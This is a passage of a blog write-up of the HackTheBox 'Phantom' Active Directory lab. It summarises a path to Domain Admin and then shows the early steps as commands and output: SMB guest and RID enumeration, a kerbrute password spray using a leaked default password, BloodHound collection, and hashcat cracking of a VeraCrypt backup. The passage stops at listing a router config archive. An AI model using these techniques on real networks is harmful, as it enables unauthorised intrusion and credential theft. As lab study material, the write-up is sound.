DEV Community

Cover image for HackTheBox: Phantom Writeup
Yogeshwar Peela
Yogeshwar Peela

Posted on • Originally published at exploitnotes.hashnode.dev

HackTheBox: Phantom Writeup

Executive Summary

Phantom is an Active Directory box where the entire path from unauthenticated guest to Domain Admin comes down to credential reuse and secrets sitting in accessible file shares. There's no memory-corruption or exotic exploit anywhere in the chain — every step is "find a leaked secret, use it to get the next one."

High-level path:

  1. Guest SMB access → leaked default onboarding password (Ph4nt0m@5t4rt!) in a PDF template on the Public share.
  2. Password spray with that default → low-priv user ibryant.
  3. ibryant can read the Departments Share → IT folder contains a VeraCrypt-encrypted backup container.
  4. Container cracked offline with hashcat → mounted → contains a VyOS router config backup.
  5. VyOS config (config.boot) has an SSTP VPN local user password stored in plaintext for lstanley (gB6XTcqVP5MlP7Rc).
  6. Password reuse: that same password is actually the credential for the service account svc_sspr → foothold + user.txt.
  7. BloodHound shows svc_sspr holds ForceChangePassword over three users, one of whom (rnichols) is in a group (ICT Security) with AddAllowedToAct rights on the DC computer object - a Resource-Based Constrained Delegation (RBCD) path.
  8. Abuse ForceChangePassword → set a known password/hash on a delegatable account → configure RBCD to allow that account to impersonate anyone against DC$ → S4U2Self+U2U / S4U2Proxy to impersonate Administrator.
  9. Full SYSTEM/Administrator access, root.txt, and NTDS dump → domain compromised.

1. Reconnaissance

1.1 Nmap

nmap -A -Pn MACHINE-IP -oA nmap
Enter fullscreen mode Exit fullscreen mode
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-07 12:38 -0400
Nmap scan report for MACHINE-IP
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
53/tcp   open  domain             Simple DNS Plus
88/tcp   open  kerberos-sec       Microsoft Windows Kerberos (server time: 2026-07-07 16:39:05Z)
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
389/tcp  open  ldap               Microsoft Windows Active Directory LDAP (Domain: phantom.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap               Microsoft Windows Active Directory LDAP (Domain: phantom.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: PHANTOM
|   NetBIOS_Domain_Name: PHANTOM
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: phantom.vl
|   DNS_Computer_Name: DC.phantom.vl
|_  System_Time: 2026-07-07T16:40:39+00:00
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: "Not Found"
...
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds
Enter fullscreen mode Exit fullscreen mode

Confirmed it's a Domain Controller for phantom.vl.

Added to /etc/hosts:

echo 'MACHINE-IP phantom.vl DC.phantom.vl dc.phantom.vl' >> /etc/hosts
Enter fullscreen mode Exit fullscreen mode

2. SMB / Guest Enumeration

2.1 Null and Guest Sessions

nxc smb MACHINE-IP -u '' -p ''
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\:
Enter fullscreen mode Exit fullscreen mode
nxc smb MACHINE-IP -u '' -p '' --shares
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\:
SMB         MACHINE-IP   445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED
Enter fullscreen mode Exit fullscreen mode

Null auth logs in but can't list shares. Guest can:

nxc smb MACHINE-IP -u 'guest' -p ''
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\guest:
Enter fullscreen mode Exit fullscreen mode
nxc smb MACHINE-IP -u 'guest' -p '' --shares
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\guest:
SMB         MACHINE-IP   445    DC               [*] Enumerated shares
SMB         MACHINE-IP   445    DC               Share           Permissions     Remark
SMB         MACHINE-IP   445    DC               -----           -----------     ------
SMB         MACHINE-IP   445    DC               ADMIN$                          Remote Admin
SMB         MACHINE-IP   445    DC               C$                              Default share
SMB         MACHINE-IP   445    DC               Departments Share
SMB         MACHINE-IP   445    DC               IPC$            READ            Remote IPC
SMB         MACHINE-IP   445    DC               NETLOGON                        Logon server share
SMB         MACHINE-IP   445    DC               Public          READ
SMB         MACHINE-IP   445    DC               SYSVOL                          Logon server share
Enter fullscreen mode Exit fullscreen mode

2.2 RID Brute → User List

nxc smb MACHINE-IP -u 'guest' -p '' --rid-brute
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\guest:
SMB         MACHINE-IP   445    DC               498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         MACHINE-IP   445    DC               500: PHANTOM\Administrator (SidTypeUser)
SMB         MACHINE-IP   445    DC               501: PHANTOM\Guest (SidTypeUser)
SMB         MACHINE-IP   445    DC               502: PHANTOM\krbtgt (SidTypeUser)
SMB         MACHINE-IP   445    DC               512: PHANTOM\Domain Admins (SidTypeGroup)
SMB         MACHINE-IP   445    DC               513: PHANTOM\Domain Users (SidTypeGroup)
...
SMB         MACHINE-IP   445    DC               1000: PHANTOM\DC$ (SidTypeUser)
SMB         MACHINE-IP   445    DC               1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB         MACHINE-IP   445    DC               1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1103: PHANTOM\svc_sspr (SidTypeUser)
SMB         MACHINE-IP   445    DC               1104: PHANTOM\TechSupports (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1105: PHANTOM\Server Admins (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1106: PHANTOM\ICT Security (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1107: PHANTOM\DevOps (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1108: PHANTOM\Accountants (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1109: PHANTOM\FinManagers (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1110: PHANTOM\EmployeeRelations (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1111: PHANTOM\HRManagers (SidTypeGroup)
SMB         MACHINE-IP   445    DC               1112: PHANTOM\rnichols (SidTypeUser)
...
SMB         MACHINE-IP   445    DC               1126: PHANTOM\crose (SidTypeUser)
...
SMB         MACHINE-IP   445    DC               1130: PHANTOM\alucas (SidTypeUser)
...
SMB         MACHINE-IP   445    DC               1137: PHANTOM\SSPR Service (SidTypeGroup)
Enter fullscreen mode Exit fullscreen mode

Piped straight into a clean user list:

nxc smb MACHINE-IP -u 'guest' -p '' --rid-brute \
| awk -F'\\\\' '/SidTypeUser/ {split($2,a," "); print a[1]}' > users.txt

cat users.txt
Enter fullscreen mode Exit fullscreen mode
Administrator
Guest
krbtgt
DC$
svc_sspr
rnichols
pharrison
wsilva
elynch
nhamilton
lstanley
bbarnes
cjones
agarcia
ppayne
ibryant
ssteward
wstewart
vhoward
crose
twright
fhanson
cferguson
alucas
ebryant
vlynch
ghall
ssimpson
ccooper
vcunningham
Enter fullscreen mode Exit fullscreen mode

30 domain users, plus interesting custom groups spotted in the RID dump: TechSupports, Server Admins, ICT Security, DevOps, Accountants, FinManagers, EmployeeRelations, HRManagers, SSPR Service.


3. Initial Foothold — Leaked Default Password

The Public share (guest-readable) contained a support email:

smbclient //phantom.vl/Public -U guest%''
Enter fullscreen mode Exit fullscreen mode
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 11:03:14 2024
  ..                                DHS        0  Thu Aug 14 07:55:49 2025
  tech_support_email.eml              A    14565  Sat Jul  6 12:08:43 2024
                6127103 blocks of size 4096. 1460793 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (5.0 KiloBytes/sec) (average 5.0 KiloBytes/sec)
smb: \>
Enter fullscreen mode Exit fullscreen mode

The .eml (from alucas@phantom.vl to techsupport@phantom.vl, subject "New Welcome Email Template for New Employees") had a base64-encoded PDF attachment. Extracted with munpack:

munpack tech_support_email.eml
Enter fullscreen mode Exit fullscreen mode
welcome_template.pdf.1 (application/pdf)
Enter fullscreen mode Exit fullscreen mode

Opening the PDF revealed the onboarding template — a placeholder welcome email with a hardcoded default password baked in for every new hire:

Username: <USERNAME>
Password: Ph4nt0m@5t4rt!
Enter fullscreen mode Exit fullscreen mode

Password Spray #1

kerbrute passwordspray -d phantom.vl --dc dc.phantom.vl users.txt 'Ph4nt0m@5t4rt!'
Enter fullscreen mode Exit fullscreen mode
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: dev (n/a) - 07/07/26 - Ronnie Flathers @ropnop
2026/07/07 12:58:07 >  Using KDC(s):
2026/07/07 12:58:07 >   dc.phantom.vl:88
2026/07/07 12:58:18 >  [!] svc_sspr@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:18 >  [!] Administrator@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:18 >  [!] DC$@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 >  [!] elynch@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 >  [!] pharrison@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 >  [!] Guest@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 >  [!] rnichols@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 >  [!] nhamilton@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 >  [!] wsilva@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 >  [!] lstanley@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:28 >  [+] VALID LOGIN:  ibryant@phantom.vl:Ph4nt0m@5t4rt!
2026/07/07 12:58:28 >  Done! Tested 22 logins (1 successes) in 20.405 seconds
Enter fullscreen mode Exit fullscreen mode

(The NETWORK ERROR lines are Kerberos pre-auth being flaky against the DC for a handful of accounts, not a real block — the spray still ran to completion and found the hit.) One new-hire (ibryant) never rotated the default onboarding password.


4. Authenticated Enumeration as ibryant

4.1 LDAP Groups

nxc ldap phantom.vl -u ibryant -p 'Ph4nt0m@5t4rt!' --groups
Enter fullscreen mode Exit fullscreen mode
LDAP        MACHINE-IP   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP        MACHINE-IP   389    DC               [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
LDAP        MACHINE-IP   389    DC               -Group-                                  -Members- -Description-
LDAP        MACHINE-IP   389    DC               Administrators                           3         Administrators have complete and unrestricted access to the computer/domain
LDAP        MACHINE-IP   389    DC               Users                                    3         Users are prevented from making accidental or intentional system-wide changes and can run most applications
LDAP        MACHINE-IP   389    DC               Guests                                   2         Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
LDAP        MACHINE-IP   389    DC               Print Operators                          0         Members can administer printers installed on domain controllers
LDAP        MACHINE-IP   389    DC               Backup Operators                         0         Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
LDAP        MACHINE-IP   389    DC               Replicator                               0         Supports file replication in a domain
LDAP        MACHINE-IP   389    DC               Remote Desktop Users                     0         Members in this group are granted the right to logon remotely
LDAP        MACHINE-IP   389    DC               Network Configuration Operators          0         Members in this group can have some administrative privileges to manage configuration of networking features
LDAP        MACHINE-IP   389    DC               Performance Monitor Users                0         Members of this group can access performance counter data locally and remotely
LDAP        MACHINE-IP   389    DC               Performance Log Users                    0         Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer
LDAP        MACHINE-IP   389    DC               Distributed COM Users                    0         Members are allowed to launch, activate and use Distributed COM objects on this machine.
LDAP        MACHINE-IP   389    DC               IIS_IUSRS                                1         Built-in group used by Internet Information Services.
LDAP        MACHINE-IP   389    DC               Cryptographic Operators                  0         Members are authorized to perform cryptographic operations.
LDAP        MACHINE-IP   389    DC               Event Log Readers                        0         Members of this group can read event logs from local machine
LDAP        MACHINE-IP   389    DC               Certificate Service DCOM Access          0         Members of this group are allowed to connect to Certification Authorities in the enterprise
LDAP        MACHINE-IP   389    DC               RDS Remote Access Servers                0         Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources.
LDAP        MACHINE-IP   389    DC               RDS Endpoint Servers                     0         Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run.
LDAP        MACHINE-IP   389    DC               RDS Management Servers                   0         Servers in this group can perform routine administrative actions on servers running Remote Desktop Services.
LDAP        MACHINE-IP   389    DC               Hyper-V Administrators                   0         Members of this group have complete and unrestricted access to all features of Hyper-V.
LDAP        MACHINE-IP   389    DC               Access Control Assistance Operators      0         Members of this group can remotely query authorization attributes and permissions for resources on this computer.
LDAP        MACHINE-IP   389    DC               Remote Management Users                  1         Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service).
LDAP        MACHINE-IP   389    DC               Storage Replica Administrators           0         Members of this group have complete and unrestricted access to all features of Storage Replica.
LDAP        MACHINE-IP   389    DC               Domain Computers                         0         All workstations and servers joined to the domain
LDAP        MACHINE-IP   389    DC               Domain Controllers                       0         All domain controllers in the domain
LDAP        MACHINE-IP   389    DC               Schema Admins                            1         Designated administrators of the schema
LDAP        MACHINE-IP   389    DC               Enterprise Admins                        1         Designated administrators of the enterprise
LDAP        MACHINE-IP   389    DC               Cert Publishers                          0         Members of this group are permitted to publish certificates to the directory
LDAP        MACHINE-IP   389    DC               Domain Admins                            1         Designated administrators of the domain
LDAP        MACHINE-IP   389    DC               Domain Users                             0         All domain users
LDAP        MACHINE-IP   389    DC               Domain Guests                            0         All domain guests
LDAP        MACHINE-IP   389    DC               Group Policy Creator Owners              1         Members in this group can modify group policy for the domain
LDAP        MACHINE-IP   389    DC               RAS and IAS Servers                      0         Servers in this group can access remote access properties of users
LDAP        MACHINE-IP   389    DC               Server Operators                         0         Members can administer domain servers
LDAP        MACHINE-IP   389    DC               Account Operators                        0         Members can administer domain user and group accounts
LDAP        MACHINE-IP   389    DC               Pre-Windows 2000 Compatible Access       1         A backward compatibility group which allows read access on all users and groups in the domain
LDAP        MACHINE-IP   389    DC               Incoming Forest Trust Builders           0         Members of this group can create incoming, one-way trusts to this forest
LDAP        MACHINE-IP   389    DC               Windows Authorization Access Group       1         Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects
LDAP        MACHINE-IP   389    DC               Terminal Server License Servers          0         Members of this group can update user accounts in Active Directory with information about license issuance
LDAP        MACHINE-IP   389    DC               Allowed RODC Password Replication Group  0         Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP        MACHINE-IP   389    DC               Denied RODC Password Replication Group   8         Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP        MACHINE-IP   389    DC               Read-only Domain Controllers             0         Members of this group are Read-Only Domain Controllers in the domain
LDAP        MACHINE-IP   389    DC               Enterprise Read-only Domain Controllers  0         Members of this group are Read-Only Domain Controllers in the enterprise
LDAP        MACHINE-IP   389    DC               Cloneable Domain Controllers             0         Members of this group that are domain controllers may be cloned.
LDAP        MACHINE-IP   389    DC               Protected Users                          0         Members of this group are afforded additional protections against authentication security threats.
LDAP        MACHINE-IP   389    DC               Key Admins                               0         Members of this group can perform administrative actions on key objects within the domain.
LDAP        MACHINE-IP   389    DC               Enterprise Key Admins                    0         Members of this group can perform administrative actions on key objects within the forest.
LDAP        MACHINE-IP   389    DC               DnsAdmins                                0         DNS Administrators Group
LDAP        MACHINE-IP   389    DC               DnsUpdateProxy                           0         DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP        MACHINE-IP   389    DC               TechSupports                             3
LDAP        MACHINE-IP   389    DC               Server Admins                            4
LDAP        MACHINE-IP   389    DC               ICT Security                             3
LDAP        MACHINE-IP   389    DC               DevOps                                   1
LDAP        MACHINE-IP   389    DC               Accountants                              3
LDAP        MACHINE-IP   389    DC               FinManagers                              7
LDAP        MACHINE-IP   389    DC               EmployeeRelations                        4
LDAP        MACHINE-IP   389    DC               HRManagers                               2
LDAP        MACHINE-IP   389    DC               SSPR Service                             1
Enter fullscreen mode Exit fullscreen mode

SSPR Service has exactly 1 member - worth checking directly who that is:

nxc ldap MACHINE-IP -u ibryant -p 'Ph4nt0m@5t4rt!' --groups "SSPR Service"
Enter fullscreen mode Exit fullscreen mode
LDAP        MACHINE-IP   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP        MACHINE-IP   389    DC               [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
LDAP        MACHINE-IP   389    DC               svc_sspr
Enter fullscreen mode Exit fullscreen mode

Confirmed: svc_sspr is the sole member of SSPR Service - a self-service-password-reset service account. The naming (SSPR = self-service password reset) is a strong hint this account has some kind of password-reset capability over other users, which turns out to be exactly right once BloodHound is loaded (Section 7).

4.2 BloodHound Collection

bloodhound-python \
-u ibryant -p 'Ph4nt0m@5t4rt!' \
-d phantom.vl \
-dc dc.phantom.vl \
-ns MACHINE-IP \
-c All \
--zip
Enter fullscreen mode Exit fullscreen mode
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::b25e:f856:306c:8016
INFO: Trying LDAP connection to dead:beef::b25e:f856:306c:8016
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::b25e:f856:306c:8016
INFO: Trying LDAP connection to dead:beef::b25e:f856:306c:8016
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 01M 09S
INFO: Compressing output into 20260707130607_bloodhound.zip
Enter fullscreen mode Exit fullscreen mode

Kerberoasting came back empty - no SPNs to target:

impacket-GetUserSPNs phantom.vl/ibryant:'Ph4nt0m@5t4rt!' -dc-ip MACHINE-IP -request
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
No entries found!
Enter fullscreen mode Exit fullscreen mode

4.3 Share Access

nxc smb phantom.vl -u ibryant -p 'Ph4nt0m@5t4rt!' --shares
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB         MACHINE-IP   445    DC               [*] Enumerated shares
SMB         MACHINE-IP   445    DC               Share           Permissions     Remark
SMB         MACHINE-IP   445    DC               -----           -----------     ------
SMB         MACHINE-IP   445    DC               ADMIN$                          Remote Admin
SMB         MACHINE-IP   445    DC               C$                              Default share
SMB         MACHINE-IP   445    DC               Departments Share READ
SMB         MACHINE-IP   445    DC               IPC$            READ            Remote IPC
SMB         MACHINE-IP   445    DC               NETLOGON        READ            Logon server share
SMB         MACHINE-IP   445    DC               Public          READ
SMB         MACHINE-IP   445    DC               SYSVOL          READ            Logon server share
Enter fullscreen mode Exit fullscreen mode

ibryant now has READ on Departments Share (guest couldn't even see permissions on it). Browsing it:

smbclient //phantom.vl/'Departments Share' -U ibryant%'Ph4nt0m@5t4rt!'
Enter fullscreen mode Exit fullscreen mode
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul  6 12:25:31 2024
  ..                                DHS        0  Thu Aug 14 07:55:49 2025
  Finance                             D        0  Sat Jul  6 12:25:11 2024
  HR                                  D        0  Sat Jul  6 12:21:31 2024
  IT                                  D        0  Thu Jul 11 10:59:02 2024
                6127103 blocks of size 4096. 1683946 blocks available
smb: \> prompt off
smb: \> cd Finance
smb: \Finance\> ls
  .                                   D        0  Sat Jul  6 12:25:11 2024
  ..                                  D        0  Sat Jul  6 12:25:31 2024
  Expense_Reports.pdf                 A   709718  Sat Jul  6 12:25:11 2024
  Invoice-Template.pdf                A   190135  Sat Jul  6 12:23:54 2024
  TaxForm.pdf                         A   160747  Sat Jul  6 12:22:58 2024
                6127103 blocks of size 4096. 1683946 blocks available
smb: \Finance\> mget *
getting file \Finance\Expense_Reports.pdf of size 709718 as Expense_Reports.pdf (307.8 KiloBytes/sec) (average 307.8 KiloBytes/sec)
getting file \Finance\Invoice-Template.pdf of size 190135 as Invoice-Template.pdf (183.5 KiloBytes/sec) (average 269.2 KiloBytes/sec)
getting file \Finance\TaxForm.pdf of size 160747 as TaxForm.pdf (157.8 KiloBytes/sec) (average 243.2 KiloBytes/sec)
smb: \Finance\> cd ..
smb: \> cd HR
smb: \HR\> ls
  .                                   D        0  Sat Jul  6 12:21:31 2024
  ..                                  D        0  Sat Jul  6 12:25:31 2024
  Employee-Emergency-Contact-Form.pdf      A    21861  Sat Jul  6 12:21:31 2024
  EmployeeHandbook.pdf                A   296436  Sat Jul  6 12:16:25 2024
  Health_Safety_Information.pdf       A  3940231  Sat Jul  6 12:20:39 2024
  NDA_Template.pdf                    A    18790  Sat Jul  6 12:17:33 2024
                6127103 blocks of size 4096. 1683946 blocks available
smb: \HR\> cd ..
smb: \> cd IT\
smb: \IT\> ls
  .                                   D        0  Thu Jul 11 10:59:02 2024
  ..                                  D        0  Sat Jul  6 12:25:31 2024
  Backup                              D        0  Sat Jul  6 14:04:34 2024
  mRemoteNG-Installer-1.76.20.24615.msi      A 43593728  Sat Jul  6 12:14:26 2024
  TeamViewerQS_x64.exe                A 32498992  Sat Jul  6 12:26:59 2024
  TeamViewer_Setup_x64.exe            A 80383920  Sat Jul  6 12:27:15 2024
  veracrypt-1.26.7-Ubuntu-22.04-amd64.deb      A  9201076  Sun Oct  1 16:30:37 2023
  Wireshark-4.2.5-x64.exe             A 86489296  Sat Jul  6 12:14:08 2024
                6127103 blocks of size 4096. 1683946 blocks available
smb: \IT\> cd Backup\
smb: \IT\Backup\> ls
  .                                   D        0  Sat Jul  6 14:04:34 2024
  ..                                  D        0  Thu Jul 11 10:59:02 2024
  IT_BACKUP_201123.hc                 A 12582912  Sat Jul  6 14:04:14 2024
                6127103 blocks of size 4096. 1683946 blocks available
smb: \IT\Backup\> get IT_BACKUP_201123.hc
Enter fullscreen mode Exit fullscreen mode

Finance/ — expense reports, invoice template, tax form — reviewed, nothing directly actionable.
HR/ — handbook, NDA template, emergency contact form — standard onboarding paperwork, nothing actionable.
IT/ — a grab-bag of installer binaries (mRemoteNG, TeamViewer, Wireshark, VeraCrypt .deb) plus a Backup/ subfolder containing IT_BACKUP_201123.hc.

The VeraCrypt installer sitting right next to a .hc file is the tell — this is a VeraCrypt encrypted container.


5. Cracking the VeraCrypt Container

hashcat -m 13721 IT_BACKUP_201123.hc custom_wordlist.txt --force
Enter fullscreen mode Exit fullscreen mode

Mode 13721 = VeraCrypt SHA512 + XTS 512-bit (legacy). Ran against a custom wordlist:

wc -l custom_wordlist.txt
161280 custom_wordlist.txt
Enter fullscreen mode Exit fullscreen mode

Slow going (~16 H/s on this hash mode), but it cracked after roughly 1h40m:

hashcat (v7.1.2) starting

IT_BACKUP_201123.hc:Phantom2023!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Tue Jul  7 22:53:38 2026, (1 hour, 41 mins)
Time.Estimated...: Wed Jul  8 00:34:47 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-128 bytes)
Guess.Base.......: File (custom_wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:       16 H/s (8.51ms) @ Accel:181 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 80545/161280 (49.94%)
Rejected.........: 0/80545 (0.00%)
Restore.Point....: 80364/161280 (49.83%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:499000-499999
Candidate.Engine.: Device Generator
Candidates.#01...: Phantom*22* -> Phantom24$
Hardware.Mon.#01.: Util: 81%
Started: Tue Jul  7 22:53:00 2026
Stopped: Wed Jul  8 00:34:50 2026
Enter fullscreen mode Exit fullscreen mode

Container password: Phantom2023!

Mounting

Kali doesn't ship VeraCrypt by default, so the CLI tool has to be installed first before the container can be opened.

Step 1 - download the official VeraCrypt Debian package:

wget https://github.com/veracrypt/VeraCrypt/releases/download/VeraCrypt_1.26.29/veracrypt-1.26.29-Debian-12-amd64.deb
Enter fullscreen mode Exit fullscreen mode

Step 2 - install it:

sudo apt install ./veracrypt-1.26.29-Debian-12-amd64.deb
Enter fullscreen mode Exit fullscreen mode

This pulls in the VeraCrypt binary and its FUSE-based mounting driver, which is what lets an encrypted container be mounted as a regular filesystem without needing a kernel module.

Step 3 - mount the container using the cracked password:

sudo veracrypt IT_BACKUP_201123.hc /mnt/ --password='Phantom2023!'
Enter fullscreen mode Exit fullscreen mode

veracrypt decrypts the container header with the supplied password (confirming the hashcat crack was correct), then mounts the decrypted volume at /mnt/ just like any other disk - ls, cd, cp, etc. all work normally against it from that point on. No prompts, no separate "unlock" step; if the password is wrong the mount simply fails.

Step 4 - browse the mounted volume:

ls /mnt/
Enter fullscreen mode Exit fullscreen mode
'$RECYCLE.BIN'         azure_vms_1104.json   splunk_logs_1102             ticketing_system_backup.zip
 azure_vms_0805.json   azure_vms_1123.json   splunk_logs1203              vyos_backup.tar.gz
 azure_vms_1023.json   splunk_logs_1003     'System Volume Information'
Enter fullscreen mode Exit fullscreen mode

This is an old IT backup drive - mixed bag of Azure VM inventory exports, Splunk log dumps, a ticketing system backup, and a VyOS router config backup. vyos_backup.tar.gz is the one worth prioritizing.

VyOS Config Extraction

tar -tvzf vyos_backup.tar.gz | head -n 150
Enter fullscreen mode Exit fullscreen mode
drwxr-xr-x root/root         0 2024-07-06 15:31 ./
lrwxrwxrwx root/root         0 2024-07-05 20:21 bin -> usr/bin
drwxrwsr-x root/vyattacfg    0 2024-07-06 15:31 config/
drwxrwsr-x root/vyattacfg    0 2024-07-06 13:21 config/archive/
-rw-rw-r-- vyos/vyattacfg 1297 2024-07-06 13:04 config/archive/config.boot.4.gz
-rw-rw-r-- vyos/vyattacfg 3630 2024-07-06 13:06 config/archive/config.boot.3.gz
-rw-rw-r-- root/vyattacfg  413 2024-07-06 13:00 config/archive/config.boot.8.gz
-rw-rw-r-- vyos/vyattacfg 1128 2024-07-06 13:04 config/archive/config.boot.5.gz
-rw-rw---- root/vyattacfg 5769 2024-07-06 13:21 config/archive/config.boot.0.gz
-rw-rw---- root/vyattacfg  907 2024-07-06 13:00 config/archive/config.boot.7.gz
-rw-rw---- root/vyattacfg 10705 2024-07-06 13:21 config/archive/config.boot
-rw-r--r-- root/vyattacfg   118 2024-07-06 15:31 config/archive/lr.conf
-rw-rw-r-- vyos/vyattacfg   926 2024-07-06 13:03 config/archive/config.boot.6.gz
-rw-r----- root/vyattacfg    92 2024-07-06 13:21 config/archive/lr.state
-rw-rw-r-- root/vyattacfg   302 2024-07-06 13:21 config/archive/commits
-rw-rw-r-- vyos/vyattacfg  5770 2024-07-06 13:07 config/archive/config.boot.1.gz
-rw-rw-r-- vyos/vyattacfg  5621 2024-07-06 13:07 config/archive/config.boot.2.gz
drwxrwsr-x root/vyattacfg     0 2024-07-05 22:46 config/support/
-rw-r--r-- root/vyattacfg   174 2024-07-06 15:31 config/vyos-activate.log
-rw-r--r-- root/vyattacfg     0 2024-07-06 12:59 config/.vyatta_config
-rw-rw---- root/vyattacfg 10705 2024-07-06 15:31 config/config.boot
drwxrwsr-x root/vyattacfg     0 2024-07-05 22:46 config/auth/
drwxrwsr-x root/vyattacfg     0 2024-07-05 22:46 config/user-data/
